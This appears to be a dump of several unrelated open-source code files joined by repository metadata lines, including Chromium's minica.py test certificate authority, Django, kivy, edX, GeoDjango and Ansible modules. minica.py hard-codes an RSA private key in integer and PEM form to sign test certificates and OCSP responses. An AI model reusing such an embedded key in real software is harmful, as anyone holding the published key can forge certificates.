print "Got wrong option: %s, exit ..." % e
sys.exit(1)
if not PARAMETERS.user:
PARAMETERS.user = "app"
global SRC_DIR, PKG_SRC_DIR
SRC_DIR = "/home/%s/content" % PARAMETERS.user
PKG_SRC_DIR = "%s/tct/opt/%s" % (SRC_DIR, PKG_NAME)
if not PARAMETERS.mode:
PARAMETERS.mode = "SDB"
if PARAMETERS.mode == "SDB":
if not PARAMETERS.device:
(return_code, output) = doCMD("sdb devices")
for line in output:
if str.find(line, "\tdevice") != -1:
PARAMETERS.device = line.split("\t")[0]
break
else:
PARAMETERS.mode = "SSH"
if not PARAMETERS.device:
print "No device provided"
sys.exit(1)
user_info = getUSERID()
re_code = user_info[0]
if re_code == 0:
global XW_ENV
userid = user_info[1][0]
XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/%s/dbus/user_bus_socket" % str(
userid)
else:
print "[Error] cmd commands error : %s" % str(user_info[1])
sys.exit(1)
if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
print "-i and -u are conflict"
sys.exit(1)
if PARAMETERS.buninstpkg:
if not uninstPKGs():
sys.exit(1)
else:
if not instPKGs():
sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
| bsd-3-clause | -3,068,844,990,641,179,600 | 28.763158 | 101 | 0.537872 | false |
hgl888/chromium-crosswalk-efl | net/tools/testserver/minica.py | 78 | 10487 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import asn1
import hashlib
import os
# This file implements very minimal certificate and OCSP generation. It's
# designed to test revocation checking.
def RandomNumber(length_in_bytes):
'''RandomNumber returns a random number of length 8*|length_in_bytes| bits'''
rand = os.urandom(length_in_bytes)
n = 0
for x in rand:
n <<= 8
n |= ord(x)
return n
def ModExp(n, e, p):
'''ModExp returns n^e mod p'''
r = 1
while e != 0:
if e & 1:
r = (r*n) % p
e >>= 1
n = (n*n) % p
return r
# PKCS1v15_SHA256_PREFIX is the ASN.1 prefix for a SHA256 signature.
PKCS1v15_SHA256_PREFIX = '3031300d060960864801650304020105000420'.decode('hex')
class RSA(object):
def __init__(self, modulus, e, d):
self.m = modulus
self.e = e
self.d = d
self.modlen = 0
m = modulus
while m != 0:
self.modlen += 1
m >>= 8
def Sign(self, message):
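    # PKCS#1 v1.5 signing: 0x00 0x01 0xff... padding, the SHA-256 DigestInfo
    # prefix, then a raw RSA private-key operation.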
digest = hashlib.sha256(message).digest()
prefix = PKCS1v15_SHA256_PREFIX
em = ['\xff'] * (self.modlen - 1 - len(prefix) - len(digest))
em[0] = '\x00'
em[1] = '\x01'
em += "\x00" + prefix + digest
n = 0
for x in em:
n <<= 8
n |= ord(x)
s = ModExp(n, self.d, self.m)
out = []
while s != 0:
out.append(s & 0xff)
s >>= 8
out.reverse()
return '\x00' * (self.modlen - len(out)) + asn1.ToBytes(out)
def ToDER(self):
return asn1.ToDER(asn1.SEQUENCE([self.m, self.e]))
def Name(cn = None, c = None, o = None):
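  # Build an X.501 Name from the optional common name, country and
  # organization values.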
names = asn1.SEQUENCE([])
if cn is not None:
names.children.append(
asn1.SET([
asn1.SEQUENCE([
COMMON_NAME, cn,
])
])
)
if c is not None:
names.children.append(
asn1.SET([
asn1.SEQUENCE([
COUNTRY, c,
])
])
)
if o is not None:
names.children.append(
asn1.SET([
asn1.SEQUENCE([
ORGANIZATION, o,
])
])
)
return names
# The private key and root certificate name are hard coded here:
# This is the private key
KEY = RSA(0x00a71998f2930bfe73d031a87f133d2f378eeeeed52a77e44d0fc9ff6f07ff32cbf3da999de4ed65832afcb0807f98787506539d258a0ce3c2c77967653099a9034a9b115a876c39a8c4e4ed4acd0c64095946fb39eeeb47a0704dbb018acf48c3a1c4b895fc409fb4a340a986b1afc45519ab9eca47c30185c771c64aa5ecf07d,
3,
0x6f6665f70cb2a9a28acbc5aa0cd374cfb49f49e371a542de0a86aa4a0554cc87f7e71113edf399021ca875aaffbafaf8aee268c3b15ded2c84fb9a4375bbc6011d841e57833bc6f998d25daf6fa7f166b233e3e54a4bae7a5aaaba21431324967d5ff3e1d4f413827994262115ca54396e7068d0afa7af787a5782bc7040e6d3)
# And the same thing in PEM format
KEY_PEM = '''-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQCnGZjykwv+c9AxqH8TPS83ju7u1Sp35E0Pyf9vB/8yy/PamZ3k
7WWDKvywgH+YeHUGU50ligzjwsd5Z2UwmakDSpsRWodsOajE5O1KzQxkCVlG+znu
60egcE27AYrPSMOhxLiV/ECftKNAqYaxr8RVGaueykfDAYXHccZKpezwfQIBAwKB
gG9mZfcMsqmiisvFqgzTdM+0n0njcaVC3gqGqkoFVMyH9+cRE+3zmQIcqHWq/7r6
+K7iaMOxXe0shPuaQ3W7xgEdhB5XgzvG+ZjSXa9vp/FmsjPj5UpLrnpaqrohQxMk
ln1f8+HU9BOCeZQmIRXKVDlucGjQr6eveHpXgrxwQObTAkEA2wBAfuduw5G0/VfN
Wx66D5fbPccfYFqLM5LuTimLmNqzK2gIKXckB2sm44gJZ6wVlumaB1CSNug2LNYx
3cAjUwJBAMNUo1hbI8ugqqwI9kpxv9+2Heea4BlnXbS6tYF8pvkHMoliuxNbXmmB
u4zNB5iZ6V0ZZ4nvtUNo2cGr/h/Lcu8CQQCSACr/RPSCYSNTj948vya1D+d+hL+V
kbIiYfQ0G7Jl5yIc8AVw+hgE8hntBVuacrkPRmaviwwkms7IjsvpKsI3AkEAgjhs
5ZIX3RXHHVtO3EvVP86+mmdAEO+TzdHOVlMZ+1ohsOx8t5I+8QEnszNaZbvw6Lua
W/UjgkXmgR1UFTJMnwJBAKErmAw21/g3SST0a4wlyaGT/MbXL8Ouwnb5IOKQVe55
CZdeVeSh6cJ4hAcQKfr2s1JaZTJFIBPGKAif5HqpydA=
-----END RSA PRIVATE KEY-----
'''
# Root certificate CN
ISSUER_CN = "Testing CA"
# All certificates are issued under this policy OID, in the Google arc:
CERT_POLICY_OID = asn1.OID([1, 3, 6, 1, 4, 1, 11129, 2, 4, 1])
# These result in the following root certificate:
# -----BEGIN CERTIFICATE-----
# MIIB0TCCATqgAwIBAgIBATANBgkqhkiG9w0BAQUFADAVMRMwEQYDVQQDEwpUZXN0aW5nIENBMB4X
# DTEwMDEwMTA2MDAwMFoXDTMyMTIwMTA2MDAwMFowFTETMBEGA1UEAxMKVGVzdGluZyBDQTCBnTAN
# BgkqhkiG9w0BAQEFAAOBiwAwgYcCgYEApxmY8pML/nPQMah/Ez0vN47u7tUqd+RND8n/bwf/Msvz
# 2pmd5O1lgyr8sIB/mHh1BlOdJYoM48LHeWdlMJmpA0qbEVqHbDmoxOTtSs0MZAlZRvs57utHoHBN
# uwGKz0jDocS4lfxAn7SjQKmGsa/EVRmrnspHwwGFx3HGSqXs8H0CAQOjMzAxMBIGA1UdEwEB/wQI
# MAYBAf8CAQAwGwYDVR0gAQEABBEwDzANBgsrBgEEAdZ5AgHODzANBgkqhkiG9w0BAQUFAAOBgQA/
# STb40A6D+93jMfLGQzXc997IsaJZdoPt7tYa8PqGJBL62EiTj+erd/H5pDZx/2/bcpOG4m9J56yg
# wOohbllw2TM+oeEd8syzV6X+1SIPnGI56JRrm3UXcHYx1Rq5loM9WKAiz/WmIWmskljsEQ7+542p
# q0pkHjs8nuXovSkUYA==
# -----END CERTIFICATE-----
# If you update any of the above, you can generate a new root with the
# following line:
# print DERToPEM(MakeCertificate(ISSUER_CN, ISSUER_CN, 1, KEY, KEY, None))
# Various OIDs
AIA_OCSP = asn1.OID([1, 3, 6, 1, 5, 5, 7, 48, 1])
AUTHORITY_INFORMATION_ACCESS = asn1.OID([1, 3, 6, 1, 5, 5, 7, 1, 1])
BASIC_CONSTRAINTS = asn1.OID([2, 5, 29, 19])
CERT_POLICIES = asn1.OID([2, 5, 29, 32])
COMMON_NAME = asn1.OID([2, 5, 4, 3])
COUNTRY = asn1.OID([2, 5, 4, 6])
HASH_SHA1 = asn1.OID([1, 3, 14, 3, 2, 26])
OCSP_TYPE_BASIC = asn1.OID([1, 3, 6, 1, 5, 5, 7, 48, 1, 1])
ORGANIZATION = asn1.OID([2, 5, 4, 10])
PUBLIC_KEY_RSA = asn1.OID([1, 2, 840, 113549, 1, 1, 1])
SHA256_WITH_RSA_ENCRYPTION = asn1.OID([1, 2, 840, 113549, 1, 1, 11])
def MakeCertificate(
issuer_cn, subject_cn, serial, pubkey, privkey, ocsp_url = None):
'''MakeCertificate returns a DER encoded certificate, signed by privkey.'''
extensions = asn1.SEQUENCE([])
# Default subject name fields
c = "XX"
o = "Testing Org"
if issuer_cn == subject_cn:
# Root certificate.
c = None
o = None
extensions.children.append(
asn1.SEQUENCE([
        BASIC_CONSTRAINTS,
True,
asn1.OCTETSTRING(asn1.ToDER(asn1.SEQUENCE([
True, # IsCA
0, # Path len
]))),
]))
if ocsp_url is not None:
extensions.children.append(
asn1.SEQUENCE([
AUTHORITY_INFORMATION_ACCESS,
False,
asn1.OCTETSTRING(asn1.ToDER(asn1.SEQUENCE([
asn1.SEQUENCE([
AIA_OCSP,
asn1.Raw(asn1.TagAndLength(0x86, len(ocsp_url)) + ocsp_url),
]),
]))),
]))
extensions.children.append(
asn1.SEQUENCE([
CERT_POLICIES,
False,
asn1.OCTETSTRING(asn1.ToDER(asn1.SEQUENCE([
asn1.SEQUENCE([ # PolicyInformation
CERT_POLICY_OID,
]),
]))),
])
)
tbsCert = asn1.ToDER(asn1.SEQUENCE([
asn1.Explicit(0, 2), # Version
serial,
asn1.SEQUENCE([SHA256_WITH_RSA_ENCRYPTION, None]), # SignatureAlgorithm
Name(cn = issuer_cn), # Issuer
asn1.SEQUENCE([ # Validity
asn1.UTCTime("100101060000Z"), # NotBefore
asn1.UTCTime("321201060000Z"), # NotAfter
]),
Name(cn = subject_cn, c = c, o = o), # Subject
asn1.SEQUENCE([ # SubjectPublicKeyInfo
asn1.SEQUENCE([ # Algorithm
PUBLIC_KEY_RSA,
None,
]),
asn1.BitString(asn1.ToDER(pubkey)),
]),
asn1.Explicit(3, extensions),
]))
return asn1.ToDER(asn1.SEQUENCE([
asn1.Raw(tbsCert),
asn1.SEQUENCE([
SHA256_WITH_RSA_ENCRYPTION,
None,
]),
asn1.BitString(privkey.Sign(tbsCert)),
]))
def MakeOCSPResponse(issuer_cn, issuer_key, serial, ocsp_state):
# https://tools.ietf.org/html/rfc2560
issuer_name_hash = asn1.OCTETSTRING(
hashlib.sha1(asn1.ToDER(Name(cn = issuer_cn))).digest())
issuer_key_hash = asn1.OCTETSTRING(
hashlib.sha1(asn1.ToDER(issuer_key)).digest())
cert_status = None
if ocsp_state == OCSP_STATE_REVOKED:
cert_status = asn1.Explicit(1, asn1.GeneralizedTime("20100101060000Z"))
elif ocsp_state == OCSP_STATE_UNKNOWN:
cert_status = asn1.Raw(asn1.TagAndLength(0x80 | 2, 0))
elif ocsp_state == OCSP_STATE_GOOD:
cert_status = asn1.Raw(asn1.TagAndLength(0x80 | 0, 0))
else:
raise ValueError('Bad OCSP state: ' + str(ocsp_state))
basic_resp_data_der = asn1.ToDER(asn1.SEQUENCE([
asn1.Explicit(2, issuer_key_hash),
asn1.GeneralizedTime("20100101060000Z"), # producedAt
asn1.SEQUENCE([
asn1.SEQUENCE([ # SingleResponse
asn1.SEQUENCE([ # CertID
asn1.SEQUENCE([ # hashAlgorithm
HASH_SHA1,
None,
]),
issuer_name_hash,
issuer_key_hash,
serial,
]),
cert_status,
asn1.GeneralizedTime("20100101060000Z"), # thisUpdate
asn1.Explicit(0, asn1.GeneralizedTime("20300101060000Z")), # nextUpdate
]),
]),
]))
basic_resp = asn1.SEQUENCE([
asn1.Raw(basic_resp_data_der),
asn1.SEQUENCE([
SHA256_WITH_RSA_ENCRYPTION,
None,
]),
asn1.BitString(issuer_key.Sign(basic_resp_data_der)),
])
resp = asn1.SEQUENCE([
asn1.ENUMERATED(0),
asn1.Explicit(0, asn1.SEQUENCE([
OCSP_TYPE_BASIC,
asn1.OCTETSTRING(asn1.ToDER(basic_resp)),
]))
])
return asn1.ToDER(resp)
def DERToPEM(der):
pem = '-----BEGIN CERTIFICATE-----\n'
pem += der.encode('base64')
pem += '-----END CERTIFICATE-----\n'
return pem
OCSP_STATE_GOOD = 1
OCSP_STATE_REVOKED = 2
OCSP_STATE_INVALID = 3
OCSP_STATE_UNAUTHORIZED = 4
OCSP_STATE_UNKNOWN = 5
# unauthorizedDER is an OCSPResponse with a status of 6:
# SEQUENCE { ENUM(6) }
unauthorizedDER = '30030a0106'.decode('hex')
def GenerateCertKeyAndOCSP(subject = "127.0.0.1",
ocsp_url = "http://127.0.0.1",
ocsp_state = OCSP_STATE_GOOD,
serial = 0):
'''GenerateCertKeyAndOCSP returns a (cert_and_key_pem, ocsp_der) where:
* cert_and_key_pem contains a certificate and private key in PEM format
with the given subject common name and OCSP URL.
* ocsp_der contains a DER encoded OCSP response or None if ocsp_url is
None'''
if serial == 0:
serial = RandomNumber(16)
cert_der = MakeCertificate(ISSUER_CN, bytes(subject), serial, KEY, KEY,
bytes(ocsp_url))
cert_pem = DERToPEM(cert_der)
ocsp_der = None
if ocsp_url is not None:
if ocsp_state == OCSP_STATE_UNAUTHORIZED:
ocsp_der = unauthorizedDER
elif ocsp_state == OCSP_STATE_INVALID:
ocsp_der = '3'
else:
ocsp_der = MakeOCSPResponse(ISSUER_CN, KEY, serial, ocsp_state)
return (cert_pem + KEY_PEM, ocsp_der)
| bsd-3-clause | 4,328,828,044,025,451,000 | 29.048711 | 271 | 0.663488 | false |
hernandito/SickRage | lib/hachoir_core/field/fake_array.py | 95 | 2294 | import itertools
from hachoir_core.field import MissingField
class FakeArray:
"""
    Simulate an array for GenericFieldSet.array(): fieldset.array("item")[0] is
    equivalent to fieldset.array("item[0]").
It's possible to iterate over the items using::
for element in fieldset.array("item"):
...
And to get array size using len(fieldset.array("item")).
"""
def __init__(self, fieldset, name):
pos = name.rfind("/")
if pos != -1:
self.fieldset = fieldset[name[:pos]]
self.name = name[pos+1:]
else:
self.fieldset = fieldset
self.name = name
self._format = "%s[%%u]" % self.name
self._cache = {}
self._known_size = False
self._max_index = -1
def __nonzero__(self):
"Is the array empty or not?"
if self._cache:
return True
else:
return (0 in self)
def __len__(self):
"Number of fields in the array"
total = self._max_index+1
if not self._known_size:
for index in itertools.count(total):
try:
field = self[index]
total += 1
except MissingField:
break
return total
def __contains__(self, index):
try:
field = self[index]
return True
except MissingField:
return False
def __getitem__(self, index):
"""
Get a field of the array. Returns a field, or raise MissingField
exception if the field doesn't exist.
"""
try:
value = self._cache[index]
except KeyError:
try:
value = self.fieldset[self._format % index]
except MissingField:
self._known_size = True
raise
self._cache[index] = value
self._max_index = max(index, self._max_index)
return value
def __iter__(self):
"""
Iterate in the fields in their index order: field[0], field[1], ...
"""
for index in itertools.count(0):
try:
yield self[index]
except MissingField:
raise StopIteration()
| gpl-3.0 | 3,188,231,176,937,157,000 | 27.320988 | 78 | 0.503051 | false |
ubc/edx-platform | common/djangoapps/util/migrations/0002_default_rate_limit_config.py | 102 | 4097 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"""Ensure that rate limiting is enabled by default. """
orm['util.RateLimitConfiguration'].objects.create(enabled=True)
def backwards(self, orm):
pass
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'util.ratelimitconfiguration': {
'Meta': {'object_name': 'RateLimitConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['util']
symmetrical = True
| agpl-3.0 | 1,078,336,367,434,218,000 | 63.015625 | 182 | 0.559678 | false |
undoware/neutron-drive | google_appengine/lib/django_1_2/django/core/files/utils.py | 901 | 1230 | class FileProxyMixin(object):
"""
A mixin class used to forward file methods to an underlaying file
object. The internal file object has to be called "file"::
class FileProxy(FileProxyMixin):
def __init__(self, file):
self.file = file
"""
encoding = property(lambda self: self.file.encoding)
fileno = property(lambda self: self.file.fileno)
flush = property(lambda self: self.file.flush)
isatty = property(lambda self: self.file.isatty)
newlines = property(lambda self: self.file.newlines)
read = property(lambda self: self.file.read)
readinto = property(lambda self: self.file.readinto)
readline = property(lambda self: self.file.readline)
readlines = property(lambda self: self.file.readlines)
seek = property(lambda self: self.file.seek)
softspace = property(lambda self: self.file.softspace)
tell = property(lambda self: self.file.tell)
truncate = property(lambda self: self.file.truncate)
write = property(lambda self: self.file.write)
writelines = property(lambda self: self.file.writelines)
xreadlines = property(lambda self: self.file.xreadlines)
def __iter__(self):
return iter(self.file)
| bsd-3-clause | 7,891,983,164,018,954,000 | 41.413793 | 69 | 0.688618 | false |
noroutine/ansible | lib/ansible/modules/remote_management/oneview/oneview_ethernet_network_facts.py | 125 | 4863 | #!/usr/bin/python
# Copyright (c) 2016-2017 Hewlett Packard Enterprise Development LP
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: oneview_ethernet_network_facts
short_description: Retrieve the facts about one or more of the OneView Ethernet Networks
description:
- Retrieve the facts about one or more of the Ethernet Networks from OneView.
version_added: "2.4"
requirements:
- hpOneView >= 2.0.1
author:
- Felipe Bulsoni (@fgbulsoni)
- Thiago Miotto (@tmiotto)
- Adriane Cardozo (@adriane-cardozo)
options:
name:
description:
- Ethernet Network name.
options:
description:
- "List with options to gather additional facts about an Ethernet Network and related resources.
Options allowed: C(associatedProfiles) and C(associatedUplinkGroups)."
extends_documentation_fragment:
- oneview
- oneview.factsparams
'''
EXAMPLES = '''
- name: Gather facts about all Ethernet Networks
oneview_ethernet_network_facts:
config: /etc/oneview/oneview_config.json
delegate_to: localhost
- debug: var=ethernet_networks
- name: Gather paginated and filtered facts about Ethernet Networks
oneview_ethernet_network_facts:
config: /etc/oneview/oneview_config.json
params:
start: 1
count: 3
sort: 'name:descending'
filter: 'purpose=General'
delegate_to: localhost
- debug: var=ethernet_networks
- name: Gather facts about an Ethernet Network by name
oneview_ethernet_network_facts:
config: /etc/oneview/oneview_config.json
name: Ethernet network name
delegate_to: localhost
- debug: var=ethernet_networks
- name: Gather facts about an Ethernet Network by name with options
oneview_ethernet_network_facts:
config: /etc/oneview/oneview_config.json
name: eth1
options:
- associatedProfiles
- associatedUplinkGroups
delegate_to: localhost
- debug: var=enet_associated_profiles
- debug: var=enet_associated_uplink_groups
'''
RETURN = '''
ethernet_networks:
description: Has all the OneView facts about the Ethernet Networks.
returned: Always, but can be null.
type: dict
enet_associated_profiles:
description: Has all the OneView facts about the profiles which are using the Ethernet network.
returned: When requested, but can be null.
type: dict
enet_associated_uplink_groups:
description: Has all the OneView facts about the uplink sets which are using the Ethernet network.
returned: When requested, but can be null.
type: dict
'''
from ansible.module_utils.oneview import OneViewModuleBase
class EthernetNetworkFactsModule(OneViewModuleBase):
argument_spec = dict(
name=dict(type='str'),
options=dict(type='list'),
params=dict(type='dict')
)
def __init__(self):
super(EthernetNetworkFactsModule, self).__init__(additional_arg_spec=self.argument_spec)
self.resource_client = self.oneview_client.ethernet_networks
def execute_module(self):
ansible_facts = {}
if self.module.params['name']:
ethernet_networks = self.resource_client.get_by('name', self.module.params['name'])
if self.module.params.get('options') and ethernet_networks:
ansible_facts = self.__gather_optional_facts(ethernet_networks[0])
else:
ethernet_networks = self.resource_client.get_all(**self.facts_params)
ansible_facts['ethernet_networks'] = ethernet_networks
return dict(changed=False, ansible_facts=ansible_facts)
def __gather_optional_facts(self, ethernet_network):
ansible_facts = {}
if self.options.get('associatedProfiles'):
ansible_facts['enet_associated_profiles'] = self.__get_associated_profiles(ethernet_network)
if self.options.get('associatedUplinkGroups'):
ansible_facts['enet_associated_uplink_groups'] = self.__get_associated_uplink_groups(ethernet_network)
return ansible_facts
def __get_associated_profiles(self, ethernet_network):
associated_profiles = self.resource_client.get_associated_profiles(ethernet_network['uri'])
return [self.oneview_client.server_profiles.get(x) for x in associated_profiles]
def __get_associated_uplink_groups(self, ethernet_network):
uplink_groups = self.resource_client.get_associated_uplink_groups(ethernet_network['uri'])
return [self.oneview_client.uplink_sets.get(x) for x in uplink_groups]
def main():
EthernetNetworkFactsModule().run()
if __name__ == '__main__':
main()
| gpl-3.0 | 1,764,563,738,703,393,000 | 31.42 | 114 | 0.695455 | false |
manthansharma/kivy | examples/canvas/mesh_manipulation.py | 21 | 3123 | '''
Mesh Manipulation Example
=========================
This demonstrates creating a mesh and using it to deform the texture (the
kivy log). You should see the kivy logo with a five sliders to right.
The sliders change the mesh points' x and y offsets, radius, and a
'wobble' deformation's magnitude and speed.
This example is developed in Gabriel's blog post at
http://kivy.org/planet/2014/01/kivy-image-manipulations-with-mesh-and-textures/
'''
from kivy.app import App
from kivy.lang import Builder
from kivy.core.image import Image as CoreImage
from kivy.properties import ListProperty, ObjectProperty, NumericProperty
from kivy.clock import Clock
from kivy.core.window import Window
from math import sin, cos, pi
kv = '''
BoxLayout:
Widget:
canvas:
Color:
rgba: 1, 1, 1, 1
Mesh:
vertices: app.mesh_points
indices: range(len(app.mesh_points) // 4)
texture: app.mesh_texture
mode: 'triangle_fan'
BoxLayout:
orientation: 'vertical'
size_hint_x: None
width: 100
Slider:
value: app.offset_x
on_value: app.offset_x = args[1]
min: -1
max: 1
Slider:
value: app.offset_y
on_value: app.offset_y = args[1]
min: -1
max: 1
Slider:
value: app.radius
on_value: app.radius = args[1]
min: 10
max: 1000
Slider:
value: app.sin_wobble
on_value: app.sin_wobble = args[1]
min: -50
max: 50
Slider:
value: app.sin_wobble_speed
on_value: app.sin_wobble_speed = args[1]
min: 0
max: 50
step: 1
'''
class MeshBallApp(App):
mesh_points = ListProperty([])
mesh_texture = ObjectProperty(None)
radius = NumericProperty(500)
offset_x = NumericProperty(.5)
offset_y = NumericProperty(.5)
sin_wobble = NumericProperty(0)
sin_wobble_speed = NumericProperty(0)
def build(self):
self.mesh_texture = CoreImage('data/logo/kivy-icon-512.png').texture
Clock.schedule_interval(self.update_points, 0)
return Builder.load_string(kv)
def update_points(self, *args):
""" replace self.mesh_points based on current slider positions.
Called continuously by a timer because this only sample code.
"""
points = [Window.width / 2, Window.height / 2, .5, .5]
i = 0
while i < 2 * pi:
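            # Each vertex is (x, y, u, v): a point on the (possibly wobbling)
            # circle plus the texture coordinate it samples.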
i += 0.01 * pi
points.extend([
Window.width / 2 + cos(i) * (self.radius + self.sin_wobble *
sin(i * self.sin_wobble_speed)),
Window.height / 2 + sin(i) * (self.radius + self.sin_wobble *
sin(i * self.sin_wobble_speed)),
self.offset_x + sin(i),
self.offset_y + cos(i)])
self.mesh_points = points
if __name__ == '__main__':
MeshBallApp().run()
| mit | -1,012,396,234,273,629,200 | 29.920792 | 79 | 0.549792 | false |
rnikiforova/GuruTubeProject | GuruTube/libraries/django/contrib/gis/tests/geo3d/models.py | 222 | 2064 | from django.contrib.gis.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class City3D(models.Model):
name = models.CharField(max_length=30)
point = models.PointField(dim=3)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class Interstate2D(models.Model):
name = models.CharField(max_length=30)
line = models.LineStringField(srid=4269)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class Interstate3D(models.Model):
name = models.CharField(max_length=30)
line = models.LineStringField(dim=3, srid=4269)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class InterstateProj2D(models.Model):
name = models.CharField(max_length=30)
line = models.LineStringField(srid=32140)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class InterstateProj3D(models.Model):
name = models.CharField(max_length=30)
line = models.LineStringField(dim=3, srid=32140)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class Polygon2D(models.Model):
name = models.CharField(max_length=30)
poly = models.PolygonField(srid=32140)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class Polygon3D(models.Model):
name = models.CharField(max_length=30)
poly = models.PolygonField(dim=3, srid=32140)
objects = models.GeoManager()
def __str__(self):
return self.name
class Point2D(models.Model):
point = models.PointField()
objects = models.GeoManager()
class Point3D(models.Model):
point = models.PointField(dim=3)
objects = models.GeoManager()
class MultiPoint3D(models.Model):
mpoint = models.MultiPointField(dim=3)
objects = models.GeoManager()
| bsd-3-clause | -8,971,634,107,930,700,000 | 25.805195 | 61 | 0.69719 | false |
boxed/WCS-Hub | wcs-hub/models.py | 1 | 1177 | from google.appengine.ext import db
from google.appengine.api import users
from json import JSONDecoder
class DictModel(db.Model):
def to_dict(self):
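        # Serialise the entity: properties whose names end in '_json' are JSON
        # decoded, and the datastore key id is added under 'id'.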
decoder = JSONDecoder()
result = dict(
[
(p[:-len('_json')], decoder.decode(getattr(self, p))) if p.endswith('_json') else (p, getattr(self, p))
for p in self.properties()
]
+[('id', unicode(self.key().id()))])
return result
class Event(DictModel):
user = db.UserProperty(auto_current_user_add=True)
name = db.StringProperty(required=True)
description = db.TextProperty()
date = db.DateProperty()
registration_opens = db.DateProperty()
registration_closes = db.DateProperty()
competitions_json = db.TextProperty()
class Registration(DictModel):
# NOTE: the parent object must be an Event instance
user = db.UserProperty(auto_current_user_add=True)
first_name = db.StringProperty(required=True)
last_name = db.StringProperty(required=True)
lead_follow = db.StringProperty(required=True)
competitions_json = db.TextProperty(required=True)
wsdc_number = db.StringProperty() | mit | -4,628,999,772,867,756,000 | 33.647059 | 119 | 0.660153 | false |
jmighion/ansible | lib/ansible/modules/windows/win_user.py | 40 | 6163 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Matt Martz <[email protected]>, and others
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: win_user
version_added: "1.7"
short_description: Manages local Windows user accounts
description:
- Manages local Windows user accounts
- For non-Windows targets, use the M(user) module instead.
options:
name:
description:
- Name of the user to create, remove or modify.
required: true
fullname:
description:
- Full name of the user
required: false
default: null
version_added: "1.9"
description:
description:
- Description of the user
required: false
default: null
version_added: "1.9"
password:
description:
- Optionally set the user's password to this (plain text) value.
required: false
default: null
update_password:
description:
- C(always) will update passwords if they differ. C(on_create) will
only set the password for newly created users.
required: false
